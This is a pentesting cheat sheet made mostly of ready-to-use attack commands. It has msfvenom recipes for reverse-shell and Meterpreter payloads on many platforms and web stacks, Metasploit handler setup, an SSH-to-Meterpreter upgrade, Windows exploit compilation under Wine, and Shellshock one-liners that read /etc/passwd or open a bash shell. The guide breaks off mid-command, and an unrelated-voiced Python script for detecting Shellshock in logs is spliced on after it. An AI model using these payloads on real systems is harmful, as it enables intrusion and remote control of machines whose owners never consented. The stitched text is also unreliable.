   https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
●  Creating Meterpreter shells with MSFVenom
   http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/

   Linux
   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
   Windows
   msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
   Mac
   msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho

   Web Payloads
   PHP
   msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
   cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
   ASP
   msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
   JSP
   msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
   WAR
   msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

   Scripting Payloads
   Python
   msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
   Bash
   msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
   Perl
   msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

   Shellcode
   For all shellcode see 'msfvenom --help-formats' for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
   Linux based shellcode
   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f <format>
   Windows based shellcode
   msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f <format>
   Mac based shellcode
   msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f <format>

   Handlers
   Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format:
   use exploit/multi/handler
   set PAYLOAD <payload>
   set LHOST <ip>
   set LPORT <port>
   set ExitOnSession false
   exploit -j -z
   Once the required values are completed, the following command will execute your handler: msfconsole -L -r <handler.rc>

●  SSH to Meterpreter:
   use auxiliary/scanner/ssh/ssh_login
   use post/multi/manage/shell_to_meterpreter
   https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
●  Compiling Windows exploits on Kali
   ○  wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
      wine mingw-get-setup.exe
      select mingw32-base
   ○  cd /root/.wine/drive_c/windows
      wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
      cd /root/.wine/drive_c/MinGW/bin
      wine gcc -o ability.exe /tmp/exploit.c -lwsock32
      wine ability.exe
●  Cross compiling exploits
   gcc -m32 -o output32 hello.c   (32 bit)
   gcc -m64 -o output hello.c     (64 bit)
●  Shellshock
   ○  git clone https://github.com/nccgroup/shocker
   ○  ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
   ○  Shellshock SSH forced command
      Check for a forced command by enabling all debug output with ssh: ssh -vvv
      ssh -i noob noob@$ip '() { :;}; /bin/bash'
   ○  cat file (view file contents)
      echo -e "HEAD /cg
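The detection side of the Shellshock checks above, added here as an example that is not part of the guide: every such probe has to start with the Bash function-definition prefix "() {" in a request header or the SSH command, so a web server's combined-format log can be searched for it. The log lines below are constructed, not real traffic.

```python
"""Find Shellshock probes in web server logs (added example, not from the guide)."""
import re

# A Shellshock payload must begin with the function-definition prefix "() {".
# \s* tolerates tabs or several spaces between the parentheses and the brace.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache/nginx combined log format; the quoted fields are request, referer, user agent.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not real traffic). Line 2 carries the probe in the
# User-Agent, line 3 in the Referer with a tab after "()", line 4 is benign text that
# merely contains parentheses and braces, line 5 is not in combined format at all.
SAMPLE_LOG = [
    '10.11.1.5 - - [10/Oct/2023:14:01:02 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '10.11.1.7 - - [10/Oct/2023:14:01:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "-" "() { :;}; /bin/cat /etc/passwd"',
    '10.11.1.8 - - [10/Oct/2023:14:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 "()\t{ :;}; /usr/bin/id" "curl/7.68.0"',
    '10.11.1.9 - - [10/Oct/2023:14:01:12 +0000] "GET /about.html HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Windows NT 10.0) {compatible}"',
    'malformed line that still carries () { :;}; somewhere',
]


def find_shellshock(lines):
    """Return one finding per suspicious line as (line_number, client_ip, field_name).

    Lines that do not parse as combined format are scanned whole (field 'raw')
    so that an odd log line cannot hide a probe from the search.
    """
    findings = []
    for n, line in enumerate(lines, start=1):
        m = COMBINED_RE.match(line)
        if m is None:
            if SHELLSHOCK_RE.search(line):
                findings.append((n, None, "raw"))
            continue
        for field in ("request", "referer", "ua"):
            if SHELLSHOCK_RE.search(m.group(field)):
                findings.append((n, m.group("ip"), field))
                break
    return findings


if __name__ == "__main__":
    for n, ip, field in find_shellshock(SAMPLE_LOG):
        print(f"line {n}: shellshock pattern in {field} from {ip}")
```

The same regular expression applied to sshd's auth log catches the forced-command variant, since the string arrives there verbatim as the requested command. Feed the function `open("access.log").read().splitlines()` to run it over a real file.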